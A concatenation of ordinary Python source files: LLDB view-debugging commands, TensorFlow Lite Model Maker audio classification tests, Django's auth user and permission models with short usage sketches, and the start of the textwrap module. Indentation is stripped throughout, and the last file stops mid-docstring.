return "Show a view or layer."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to show.",
)
]
def run(self, args, options):
viewHelpers.setViewHidden(args[0], False)
class FBHideViewCommand(fb.FBCommand):
def name(self):
return "hide"
def description(self):
return "Hide a view or layer."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to hide.",
)
]
def run(self, args, options):
viewHelpers.setViewHidden(args[0], True)
class FBPresentViewControllerCommand(fb.FBCommand):
def name(self):
return "present"
def description(self):
return "Present a view controller."
def args(self):
return [
fb.FBCommandArgument(
arg="viewController",
type="UIViewController *",
help="The view controller to present.",
)
]
def run(self, args, option):
viewControllerHelpers.presentViewController(args[0])
class FBDismissViewControllerCommand(fb.FBCommand):
def name(self):
return "dismiss"
def description(self):
return "Dismiss a presented view controller."
def args(self):
return [
fb.FBCommandArgument(
arg="viewController",
type="UIViewController *",
help="The view controller to dismiss.",
)
]
def run(self, args, option):
viewControllerHelpers.dismissViewController(args[0])
class FBSlowAnimationCommand(fb.FBCommand):
def name(self):
return "slowanim"
def description(self):
return "Slows down animations. Works on the iOS Simulator and a device."
def args(self):
return [
fb.FBCommandArgument(
arg="speed",
type="float",
default=0.1,
help="Animation speed (default 0.1).",
)
]
def run(self, args, option):
viewHelpers.slowAnimation(args[0])
class FBUnslowAnimationCommand(fb.FBCommand):
def name(self):
return "unslowanim"
def description(self):
return "Turn off slow animations."
def run(self, args, option):
viewHelpers.slowAnimation()
|
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for audio specs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import unittest
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_examples.lite.model_maker.core.task import configs
from tensorflow_examples.lite.model_maker.core.task import model_util
from tensorflow_examples.lite.model_maker.core.task.model_spec import audio_spec
def _gen_dataset(spec, total_samples, num_classes, batch_size, seed):
def fill_shape(new_shape):
@tf.function
def fn(value):
return tf.cast(tf.fill(dims=new_shape, value=value), tf.float32)
return fn
wav_ds = tf.data.experimental.RandomDataset(seed=seed).take(total_samples)
wav_ds = wav_ds.map(fill_shape([
spec.target_sample_rate,
]))
labels = tf.data.Dataset.from_tensor_slices(
np.random.randint(low=0, high=num_classes,
size=total_samples).astype('int32'))
dataset = tf.data.Dataset.zip((wav_ds, labels))
dataset = spec.preprocess_ds(dataset)
@tf.function
def _one_hot_encoding_label(wav, label):
return wav, tf.one_hot(label, num_classes)
dataset = dataset.map(_one_hot_encoding_label)
dataset = dataset.batch(batch_size)
return dataset
class BaseSpecTest(tf.test.TestCase):
def testEnsureVersion(self):
valid_versions = ['2.5.0', '2.5.0rc1', '2.6']
invalid_versions = [
'2.4.1',
]
specs = [audio_spec.YAMNetSpec, audio_spec.BrowserFFTSpec]
tmp_version_fn = audio_spec._get_tf_version
for spec in specs:
for version in valid_versions:
audio_spec._get_tf_version = lambda: version # pylint: disable=cell-var-from-loop
spec()
for version in invalid_versions:
audio_spec._get_tf_version = lambda: version # pylint: disable=cell-var-from-loop
with self.assertRaisesRegexp(RuntimeError, '2.5.0'):
spec()
audio_spec._get_tf_version = tmp_version_fn
class BaseTest(tf.test.TestCase):
def _train_and_export(self,
spec,
num_classes,
filename,
expected_model_size,
quantization_config=None,
training=True):
dataset = _gen_dataset(
spec, total_samples=10, num_classes=num_classes, batch_size=2, seed=100)
model = spec.create_model(num_classes)
epochs = 1 if training else 0
spec.run_classifier(
model, epochs=epochs, train_ds=dataset, validation_ds=None)
tflite_filepath = os.path.join(self.get_temp_dir(), filename)
spec.export_tflite(
model,
tflite_filepath,
index_to_label=['label_{}'.format(i) for i in range(num_classes)],
quantization_config=quantization_config)
self.assertNear(
os.path.getsize(tflite_filepath), expected_model_size, 1000 * 1000)
return tflite_filepath
@unittest.skipIf(tf.__version__ < '2.5',
'Audio Classification requires TF 2.5 or later')
class YAMNetSpecTest(BaseTest):
def _test_preprocess(self, input_shape, input_count, output_shape,
output_count):
spec = audio_spec.YAMNetSpec()
wav_ds = tf.data.Dataset.from_tensor_slices([tf.ones(input_shape)] *
input_count)
label_ds = tf.data.Dataset.range(input_count).map(
lambda x: tf.cast(x, tf.int32))
ds = tf.data.Dataset.zip((wav_ds, label_ds))
ds = spec.preprocess_ds(ds)
chunks = output_count // input_count
cnt = 0
for item, label in ds:
cnt += 1
self.assertEqual(cnt, output_count)
# More thorough checks.
cnt = 0
for item, label in ds:
self.assertEqual(output_shape, item.shape)
self.assertEqual(label, cnt // chunks)
cnt += 1
def test_preprocess(self):
# No padding on the input.
self._test_preprocess(
input_shape=(10,), input_count=2, output_shape=(1024,), output_count=0)
# Split the input data into chunks
self._test_preprocess(
input_shape=(16000 * 2,),
input_count=2,
output_shape=(1024,),
output_count=6)
self._test_preprocess(
input_shape=(15600,),
input_count=1,
output_shape=(1024,),
output_count=1)
def test_create_model(self):
# Make sure that there is no naming conflicts in the graph.
spec = audio_spec.YAMNetSpec()
model = spec.create_model(10)
model = spec.create_model(10)
model = spec.create_model(10)
self.assertEqual(model.input_shape, (None, 1024))
self.assertEqual(model.output_shape, (None, 10))
def test_yamnet_two_heads(self):
tflite_path = self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=2,
filename='two_heads.tflite',
expected_model_size=15 * 1000 * 1000)
self.assertEqual(
2, len(model_util.get_lite_runner(tflite_path).output_details))
self.assertAllEqual(
[1, 521],
model_util.get_lite_runner(tflite_path).output_details[0]['shape'])
self.assertAllEqual(
[1, 2],
model_util.get_lite_runner(tflite_path).output_details[1]['shape'])
self.assertEqual(
model_util.extract_tflite_metadata_json(tflite_path), """{
"name": "yamnet/classification",
"description": "Recognizes sound events",
"version": "v1",
"subgraph_metadata": [
{
"input_tensor_metadata": [
{
"name": "audio_clip",
"description": "Input audio clip to be classified.",
"content": {
"content_properties_type": "AudioProperties",
"content_properties": {
"sample_rate": 16000,
"channels": 1
}
},
"stats": {
}
}
],
"output_tensor_metadata": [
{
"name": "yamnet",
"description": "Scores in range 0..1.0 for each of the 521 output classes.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "yamnet_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
},
{
"name": "custom",
"description": "Scores in range 0..1.0 for each output classes.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "custom_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
}
]
}
],
"author": "TensorFlow Lite Model Maker",
"license": "Apache License. Version 2.0 http://www.apache.org/licenses/LICENSE-2.0.",
"min_parser_version": "1.3.0"
}
""")
def test_yamnet_single_head(self):
tflite_path = self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=False),
num_classes=2,
filename='single_head.tflite',
expected_model_size=13 * 1000 * 1000)
self.assertEqual(
1, len(model_util.get_lite_runner(tflite_path).output_details))
self.assertAllEqual(
[1, 2],
model_util.get_lite_runner(tflite_path).output_details[0]['shape'])
self.assertEqual(
model_util.extract_tflite_metadata_json(tflite_path), """{
"name": "yamnet/classification",
"description": "Recognizes sound events",
"version": "v1",
"subgraph_metadata": [
{
"input_tensor_metadata": [
{
"name": "audio_clip",
"description": "Input audio clip to be classified.",
"content": {
"content_properties_type": "AudioProperties",
"content_properties": {
"sample_rate": 16000,
"channels": 1
}
},
"stats": {
}
}
],
"output_tensor_metadata": [
{
"name": "custom",
"description": "Scores in range 0..1.0 for each output classes.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "custom_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
}
]
}
],
"author": "TensorFlow Lite Model Maker",
"license": "Apache License. Version 2.0 http://www.apache.org/licenses/LICENSE-2.0.",
"min_parser_version": "1.3.0"
}
""")
def test_no_metadata(self):
audio_spec.ENABLE_METADATA = False
tflite_path = self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=2,
filename='two_heads.tflite',
expected_model_size=15 * 1000 * 1000)
self.assertEqual(
2, len(model_util.get_lite_runner(tflite_path).output_details))
with self.assertRaisesRegex(ValueError, 'The model does not have metadata'):
model_util.extract_tflite_metadata_json(tflite_path)
audio_spec.ENABLE_METADATA = True
def test_binary_classification(self):
self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=2,
filename='binary_classification.tflite',
expected_model_size=15 * 1000 * 1000)
def test_dynamic_range_quantization(self):
self._train_and_export(
audio_spec.YAMNetSpec(keep_yamnet_and_custom_heads=True),
num_classes=5,
filename='basic_5_classes_training.tflite',
expected_model_size=4 * 1000 * 1000,
quantization_config=configs.QuantizationConfig.for_dynamic())
@unittest.skipIf(tf.__version__ < '2.5',
'Audio Classification requires TF 2.5 or later')
class BrowserFFTSpecTest(BaseTest):
@classmethod
def setUpClass(cls):
super(BrowserFFTSpecTest, cls).setUpClass()
cls._spec = audio_spec.BrowserFFTSpec()
def test_model_initialization(self):
model = self._spec.create_model(10)
self.assertEqual(self._spec._preprocess_model.input_shape,
(None, self._spec.EXPECTED_WAVEFORM_LENGTH))
self.assertEqual(self._spec._preprocess_model.output_shape,
(None, None, 232, 1))
self.assertEqual(self._spec._tfjs_sc_model.input_shape, (None, 43, 232, 1))
self.assertEqual(self._spec._tfjs_sc_model.output_shape, (None, 20))
self.assertEqual(model.input_shape, (None, 43, 232, 1))
self.assertEqual(model.output_shape, (None, 10))
def test_create_model(self):
# Make sure that there is no naming conflicts.
self._spec.create_model(100)
self._spec.create_model(100)
self._spec.create_model(100)
tf.keras.backend.clear_session()
# Binary classification is not supported yet.
with self.assertRaises(ValueError):
self._spec.create_model(0)
tf.keras.backend.clear_session()
with self.assertRaises(ValueError):
self._spec.create_model(1)
tf.keras.backend.clear_session()
# It's more efficient to use BinaryClassification when num_classes=2, but
# this is still supported (slightly less efficient).
self._spec.create_model(20)
tf.keras.backend.clear_session()
def test_dynamic_range_quantization(self):
self._train_and_export(
audio_spec.BrowserFFTSpec(),
num_classes=2,
filename='binary_classification.tflite',
expected_model_size=1 * 1000 * 1000,
quantization_config=configs.QuantizationConfig.for_dynamic(),
training=False) # Training results in NaN values with the current scheme.
def test_binary_classification(self):
self._train_and_export(
audio_spec.BrowserFFTSpec(),
num_classes=2,
filename='binary_classification.tflite',
expected_model_size=6 * 1000 * 1000)
def test_basic_training(self):
tflite_path = self._train_and_export(
audio_spec.BrowserFFTSpec(),
num_classes=5,
filename='basic_5_classes_training.tflite',
expected_model_size=6 * 1000 * 1000)
self.assertEqual(
model_util.extract_tflite_metadata_json(tflite_path), """{
"name": "AudioClassifier",
"description": "Identify the most prominent type in the audio clip from a known set of categories.",
"version": "v1",
"subgraph_metadata": [
{
"input_tensor_metadata": [
{
"name": "audio_clip",
"description": "Input audio clip to be classified.",
"content": {
"content_properties_type": "AudioProperties",
"content_properties": {
"sample_rate": 44100,
"channels": 1
}
},
"stats": {
}
}
],
"output_tensor_metadata": [
{
"name": "probability",
"description": "Scores of the labels respectively.",
"content": {
"content_properties_type": "FeatureProperties",
"content_properties": {
}
},
"stats": {
"max": [
1.0
],
"min": [
0.0
]
},
"associated_files": [
{
"name": "probability_labels.txt",
"description": "Labels for categories that the model can recognize.",
"type": "TENSOR_AXIS_LABELS"
}
]
}
]
}
],
"author": "TensorFlow Lite Model Maker",
"license": "Apache License. Version 2.0 http://www.apache.org/licenses/LICENSE-2.0.",
"min_parser_version": "1.3.0"
}
""")
if __name__ == '__main__':
# Load compressed models from tensorflow_hub
os.environ['TFHUB_MODEL_LOAD_FORMAT'] = 'COMPRESSED'
tf.test.main()
|
|
from __future__ import unicode_literals
import re
import warnings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail import send_mail
from django.core import validators
from django.db import models
from django.db.models.manager import EmptyManager
from django.utils.crypto import get_random_string
from django.utils.http import urlquote
from django.utils import six
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib import auth
# UNUSABLE_PASSWORD is still imported here for backwards compatibility
from django.contrib.auth.hashers import (
check_password, make_password, is_password_usable, UNUSABLE_PASSWORD)
from django.contrib.auth.signals import user_logged_in
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import python_2_unicode_compatible
def update_last_login(sender, user, **kwargs):
"""
A signal receiver which updates the last_login date for
the user logging in.
"""
user.last_login = timezone.now()
user.save(update_fields=['last_login'])
user_logged_in.connect(update_last_login)
class SiteProfileNotAvailable(Exception):
pass
class PermissionManager(models.Manager):
def get_by_natural_key(self, codename, app_label, model):
return self.get(
codename=codename,
content_type=ContentType.objects.get_by_natural_key(app_label,
model),
)
@python_2_unicode_compatible
class Permission(models.Model):
"""
The permissions system provides a way to assign permissions to specific
users and groups of users.
The permission system is used by the Django admin site, but may also be
useful in your own code. The Django admin site uses permissions as follows:
- The "add" permission limits the user's ability to view the "add" form
and add an object.
- The "change" permission limits a user's ability to view the change
list, view the "change" form and change an object.
- The "delete" permission limits the ability to delete an object.
Permissions are set globally per type of object, not per specific object
instance. It is possible to say "Mary may change news stories," but it's
not currently possible to say "Mary may change news stories, but only the
ones she created herself" or "Mary may only change news stories that have a
certain status or publication date."
Three basic permissions -- add, change and delete -- are automatically
created for each Django model.
"""
name = models.CharField(_('name'), max_length=50)
content_type = models.ForeignKey(ContentType)
codename = models.CharField(_('codename'), max_length=100)
objects = PermissionManager()
class Meta:
verbose_name = _('permission')
verbose_name_plural = _('permissions')
unique_together = (('content_type', 'codename'),)
ordering = ('content_type__app_label', 'content_type__model',
'codename')
def __str__(self):
return "%s | %s | %s" % (
six.text_type(self.content_type.app_label),
six.text_type(self.content_type),
six.text_type(self.name))
def natural_key(self):
return (self.codename,) + self.content_type.natural_key()
natural_key.dependencies = ['contenttypes.contenttype']
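# Hedged usage sketch (not Django source): the natural-key round trip that
# serialization relies on. Assumes a configured project where the 'auth' app's
# content types exist; the codename below is illustrative.
def _example_permission_natural_key():
    perm = Permission.objects.get(codename='change_user',
                                  content_type__app_label='auth')
    codename, app_label, model = perm.natural_key()
    # get_by_natural_key() reverses the tuple produced by natural_key()
    return Permission.objects.get_by_natural_key(codename, app_label, model)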
class GroupManager(models.Manager):
"""
The manager for the auth's Group model.
"""
def get_by_natural_key(self, name):
return self.get(name=name)
@python_2_unicode_compatible
class Group(models.Model):
"""
Groups are a generic way of categorizing users to apply permissions, or
some other label, to those users. A user can belong to any number of
groups.
A user in a group automatically has all the permissions granted to that
group. For example, if the group Site editors has the permission
can_edit_home_page, any user in that group will have that permission.
Beyond permissions, groups are a convenient way to categorize users to
apply some label, or extended functionality, to them. For example, you
could create a group 'Special users', and you could write code that would
do special things to those users -- such as giving them access to a
members-only portion of your site, or sending them members-only email
messages.
"""
name = models.CharField(_('name'), max_length=80, unique=True)
permissions = models.ManyToManyField(Permission,
verbose_name=_('permissions'), blank=True)
objects = GroupManager()
class Meta:
verbose_name = _('group')
verbose_name_plural = _('groups')
def __str__(self):
return self.name
def natural_key(self):
return (self.name,)
class BaseUserManager(models.Manager):
@classmethod
def normalize_email(cls, email):
"""
Normalize the address by lowercasing the domain part of the email
address.
"""
email = email or ''
try:
email_name, domain_part = email.strip().rsplit('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
return email
def make_random_password(self, length=10,
allowed_chars='abcdefghjkmnpqrstuvwxyz'
'ABCDEFGHJKLMNPQRSTUVWXYZ'
'23456789'):
"""
Generates a random password with the given length and given
allowed_chars. Note that the default value of allowed_chars does not
have "I" or "O" or letters and digits that look similar -- just to
avoid confusion.
"""
return get_random_string(length, allowed_chars)
def get_by_natural_key(self, username):
return self.get(**{self.model.USERNAME_FIELD: username})
class UserManager(BaseUserManager):
def create_user(self, username, email=None, password=None, **extra_fields):
"""
Creates and saves a User with the given username, email and password.
"""
now = timezone.now()
if not username:
raise ValueError('The given username must be set')
email = self.normalize_email(email)
user = self.model(username=username, email=email,
is_staff=False, is_active=True, is_superuser=False,
last_login=now, date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, username, email, password, **extra_fields):
u = self.create_user(username, email, password, **extra_fields)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
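# Hedged usage sketch: typical manager calls. normalize_email() lowercases only
# the domain part, so the two spellings of the address below compare equal.
# (User is defined later in this module; the name resolves at call time.)
def _example_create_users():
    alice = User.objects.create_user('alice', '[email protected]', 's3cret')
    admin = User.objects.create_superuser('admin', '[email protected]', 's3cret')
    assert alice.email == UserManager.normalize_email('[email protected]')
    return alice, admin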
@python_2_unicode_compatible
class AbstractBaseUser(models.Model):
password = models.CharField(_('password'), max_length=128)
last_login = models.DateTimeField(_('last login'), default=timezone.now)
is_active = True
REQUIRED_FIELDS = []
class Meta:
abstract = True
def get_username(self):
"Return the identifying username for this User"
return getattr(self, self.USERNAME_FIELD)
def __str__(self):
return self.get_username()
def natural_key(self):
return (self.get_username(),)
def is_anonymous(self):
"""
Always returns False. This is a way of comparing User objects to
anonymous users.
"""
return False
def is_authenticated(self):
"""
Always return True. This is a way to tell if the user has been
authenticated in templates.
"""
return True
def set_password(self, raw_password):
self.password = make_password(raw_password)
def check_password(self, raw_password):
"""
Returns a boolean of whether the raw_password was correct. Handles
hashing formats behind the scenes.
"""
def setter(raw_password):
self.set_password(raw_password)
self.save(update_fields=["password"])
return check_password(raw_password, self.password, setter)
def set_unusable_password(self):
# Sets a value that will never be a valid hash
self.password = make_password(None)
def has_usable_password(self):
return is_password_usable(self.password)
def get_full_name(self):
raise NotImplementedError()
def get_short_name(self):
raise NotImplementedError()
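# Hedged usage sketch: password handling on any AbstractBaseUser subclass. Only
# the salted hash is stored; check_password() also re-hashes transparently via
# the setter when the preferred hasher changes. The raw password is a placeholder.
def _example_password_handling(user, raw_password='correct horse battery'):
    user.set_password(raw_password)            # stores a hash, never the raw value
    assert user.check_password(raw_password)
    user.set_unusable_password()
    assert not user.has_usable_password()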
# A few helper functions for common logic between User and AnonymousUser.
def _user_get_all_permissions(user, obj):
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_all_permissions"):
permissions.update(backend.get_all_permissions(user, obj))
return permissions
def _user_has_perm(user, perm, obj):
for backend in auth.get_backends():
if hasattr(backend, "has_perm"):
if backend.has_perm(user, perm, obj):
return True
return False
def _user_has_module_perms(user, app_label):
for backend in auth.get_backends():
if hasattr(backend, "has_module_perms"):
if backend.has_module_perms(user, app_label):
return True
return False
class PermissionsMixin(models.Model):
"""
A mixin class that adds the fields and methods necessary to support
Django's Group and Permission model using the ModelBackend.
"""
is_superuser = models.BooleanField(_('superuser status'), default=False,
help_text=_('Designates that this user has all permissions without '
'explicitly assigning them.'))
groups = models.ManyToManyField(Group, verbose_name=_('groups'),
blank=True, help_text=_('The groups this user belongs to. A user will '
'get all permissions granted to each of '
'his/her group.'))
user_permissions = models.ManyToManyField(Permission,
verbose_name=_('user permissions'), blank=True,
help_text=_('Specific permissions for this user.'))
class Meta:
abstract = True
def get_group_permissions(self, obj=None):
"""
Returns a list of permission strings that this user has through his/her
groups. This method queries all available auth backends. If an object
is passed in, only permissions matching this object are returned.
"""
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_group_permissions"):
permissions.update(backend.get_group_permissions(self, obj))
return permissions
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj)
def has_perm(self, perm, obj=None):
"""
Returns True if the user has the specified permission. This method
queries all available auth backends, but returns immediately if any
backend returns True. Thus, a user who has permission from a single
auth backend is assumed to have permission in general. If an object is
provided, permissions for this specific object are checked.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
# Otherwise we need to check the backends.
return _user_has_perm(self, perm, obj)
def has_perms(self, perm_list, obj=None):
"""
Returns True if the user has each of the specified permissions. If
object is passed, it checks if the user has all required perms for this
object.
"""
for perm in perm_list:
if not self.has_perm(perm, obj):
return False
return True
def has_module_perms(self, app_label):
"""
Returns True if the user has any permissions in the given app label.
Uses pretty much the same logic as has_perm, above.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
return _user_has_module_perms(self, app_label)
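# Hedged usage sketch: the permission checks above as they typically appear in
# view code. 'polls.change_poll' and friends are illustrative permission strings.
def _example_permission_checks(user):
    can_edit = user.has_perm('polls.change_poll')            # single permission
    can_manage = user.has_perms(['polls.add_poll',
                                 'polls.change_poll'])        # all must hold
    touches_app = user.has_module_perms('polls')              # any perm in the app
    return can_edit, can_manage, touches_app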
class AbstractUser(AbstractBaseUser, PermissionsMixin):
"""
An abstract base class implementing a fully featured User model with
admin-compliant permissions.
Username, password and email are required. Other fields are optional.
"""
username = models.CharField(_('username'), max_length=30, unique=True,
help_text=_('Required. 30 characters or fewer. Letters, numbers and '
'@/./+/-/_ characters'),
validators=[
validators.RegexValidator(re.compile('^[\w.@+-]+$'), _('Enter a valid username.'), 'invalid')
])
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=30, blank=True)
email = models.EmailField(_('email address'), blank=True)
is_staff = models.BooleanField(_('staff status'), default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as '
'active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
objects = UserManager()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
abstract = True
def get_absolute_url(self):
return "/users/%s/" % urlquote(self.username)
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"Returns the short name for the user."
return self.first_name
def email_user(self, subject, message, from_email=None):
"""
Sends an email to this User.
"""
send_mail(subject, message, from_email, [self.email])
def get_profile(self):
"""
Returns site-specific profile for this user. Raises
SiteProfileNotAvailable if this site does not allow profiles.
"""
warnings.warn("The use of AUTH_PROFILE_MODULE to define user profiles has been deprecated.",
DeprecationWarning, stacklevel=2)
if not hasattr(self, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable(
'You need to set AUTH_PROFILE_MODULE in your project '
'settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable(
'app_label and model_name should be separated by a dot in '
'the AUTH_PROFILE_MODULE setting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable(
'Unable to load the profile model, check '
'AUTH_PROFILE_MODULE in your project settings')
self._profile_cache = model._default_manager.using(
self._state.db).get(user__id__exact=self.id)
self._profile_cache.user = self
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return self._profile_cache
class User(AbstractUser):
"""
Users within the Django authentication system are represented by this
model.
Username, password and email are required. Other fields are optional.
"""
class Meta(AbstractUser.Meta):
swappable = 'AUTH_USER_MODEL'
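# Hedged usage sketch: because User.Meta.swappable is 'AUTH_USER_MODEL',
# reusable code should resolve the active user model instead of importing User
# directly. The settings value mentioned in the comment is a placeholder.
def _example_resolve_user_model():
    from django.contrib.auth import get_user_model
    UserModel = get_user_model()  # honours settings.AUTH_USER_MODEL, e.g. 'accounts.Member'
    return UserModel.objects.filter(is_active=True)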
@python_2_unicode_compatible
class AnonymousUser(object):
id = None
pk = None
username = ''
is_staff = False
is_active = False
is_superuser = False
_groups = EmptyManager(Group)
_user_permissions = EmptyManager(Permission)
def __init__(self):
pass
def __str__(self):
return 'AnonymousUser'
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return 1 # instances always return the same hash value
def save(self):
raise NotImplementedError
def delete(self):
raise NotImplementedError
def set_password(self, raw_password):
raise NotImplementedError
def check_password(self, raw_password):
raise NotImplementedError
def _get_groups(self):
return self._groups
groups = property(_get_groups)
def _get_user_permissions(self):
return self._user_permissions
user_permissions = property(_get_user_permissions)
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj=obj)
def has_perm(self, perm, obj=None):
return _user_has_perm(self, perm, obj=obj)
def has_perms(self, perm_list, obj=None):
for perm in perm_list:
if not self.has_perm(perm, obj):
return False
return True
def has_module_perms(self, module):
return _user_has_module_perms(self, module)
def is_anonymous(self):
return True
def is_authenticated(self):
return False
|
|
"""Text wrapping and filling.
"""
# Copyright (C) 1999-2001 Gregory P. Ward.
# Copyright (C) 2002, 2003 Python Software Foundation.
# Written by Greg Ward <[email protected]>
__revision__ = "$Id: textwrap.py 75231 2009-10-04 14:49:41Z benjamin.peterson $"
import string, re
__all__ = ['TextWrapper', 'wrap', 'fill', 'dedent']
# Hardcode the recognized whitespace characters to the US-ASCII
# whitespace characters. The main reason for doing this is that in
# ISO-8859-1, 0xa0 is non-breaking whitespace, so in certain locales
# that character winds up in string.whitespace. Respecting
# string.whitespace in those cases would 1) make textwrap treat 0xa0 the
# same as any other whitespace char, which is clearly wrong (it's a
# *non-breaking* space), 2) possibly cause problems with Unicode,
# since 0xa0 is not in range(128).
_whitespace = '\t\n\x0b\x0c\r '
class TextWrapper:
"""
Object for wrapping/filling text. The public interface consists of
the wrap() and fill() methods; the other methods are just there for
subclasses to override in order to tweak the default behaviour.
If you want to completely replace the main wrapping algorithm,
you'll probably have to override _wrap_chunks().
Several instance attributes control various aspects of wrapping:
width (default: 70)
the maximum width of wrapped lines (unless break_long_words
is false)
initial_indent (default: "")
string that will be prepended to the first line of wrapped
output. Counts towards the line's width.
subsequent_indent (default: "")
string that will be prepended to all lines save the first
of wrapped output; also counts towards each line's width.
expand_tabs (default: true)
Expand tabs in input text to spaces before further processing.
Each tab will become 1 .. 8 spaces, depending on its position in
its line. If false, each tab is treated as a single character.
replace_whitespace (default: true)
Replace all whitespace characters in the input text by spaces
after tab expansion. Note that if expand_tabs is false and
replace_whitespace is true, every tab will be converted to a
single space!
fix_sentence_endings (default: false)
Ensure that sentence-ending punctuation is always followed
by two spaces. Off by default because the algorithm is
(unavoidably) imperfect.
break_long_words (default: true)
Break words longer than 'width'. If false, those words will not
be broken, and some lines might be longer than 'width'.
break_on_hyphens (default: true)
Allow breaking hyphenated words. If true, wrapping will occur
preferably on whitespaces and right after hyphens part of
compound words.
drop_whitespace (default: true)
Drop leading and trailing whitespace from lines.
"""
unicode_whitespace_trans = {}
uspace = ord(' ')
for x in _whitespace:
unicode_whitespace_trans[ord(x)] = uspace
# This funky little regex is just the trick for splitting
# text up into word-wrappable chunks. E.g.
# "Hello there -- you goof-ball, use the -b option!"
# splits into
# Hello/ /there/ /--/ /you/ /goof-/ball,/ /use/ /the/ /-b/ /option!
# (after stripping out empty strings).
wordsep_re = re.compile(
r'(\s+|' # any whitespace
r'[^\s\w]*\w+[^0-9\W]-(?=\w+[^0-9\W])|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))') # em-dash
# This less funky little regex just splits on recognized spaces. E.g.
# "Hello there -- you goof-ball, use the -b option!"
# splits into
# Hello/ /there/ /--/ /you/ /goof-ball,/ /use/ /the/ /-b/ /option!/
wordsep_simple_re = re.compile(r'(\s+)')
# XXX this is not locale- or charset-aware -- string.lowercase
# is US-ASCII only (and therefore English-only)
sentence_end_re = re.compile(r'[a-z]' # lowercase letter
r'[\.\!\?]' # sentence-ending punct.
r'[\"\']?' # optional end-of-quote
r'\Z') # end of chunk
def __init__(self,
width=70,
initial_indent="",
subsequent_indent="",
expand_tabs=True,
replace_whitespace=True,
fix_sentence_endings=False,
break_long_words=True,
drop_whitespace=True,
break_on_hyphens=True):
self.width = width
self.initial_indent = initial_indent
self.subsequent_indent = subsequent_indent
self.expand_tabs = expand_tabs
self.replace_whitespace = replace_whitespace
self.fix_sentence_endings = fix_sentence_endings
self.break_long_words = break_long_words
self.drop_whitespace = drop_whitespace
self.break_on_hyphens = break_on_hyphens
# -- Private methods -----------------------------------------------
# (possibly useful for subclasses to override)
def _munge_whitespace(self, text):
"""_munge_whitespace(text : string) -> string
Munge whitespace in text: expand tabs and convert all other
whitespace characters to spaces. Eg. " foo\tbar\n\nbaz"
becomes " foo bar baz".
"""
if self.expand_tabs:
text = text.expandtabs()
if self.replace_whitespace:
text = text.translate(self.unicode_whitespace_trans)
return text
def _split(self, text):
"""_split(text : string) -> [string]
Split the text to wrap into indivisible chunks. Chunks are
not quite the same as words; see _wrap_chunks() for full
details. As an example, the text
Look, goof-ball -- use the -b option!
breaks into the following chunks:
'Look,', ' ', 'goof-', 'ball', ' ', '--', ' ',
'use', ' ', 'the', ' ', '-b', ' ', 'option!'
if break_on_hyphens is True, or in:
'Look,', ' ', 'goof-ball', ' ', '--', ' ',
'use', ' ', 'the', ' ', '-b', ' ', 'option!'
otherwise.
"""
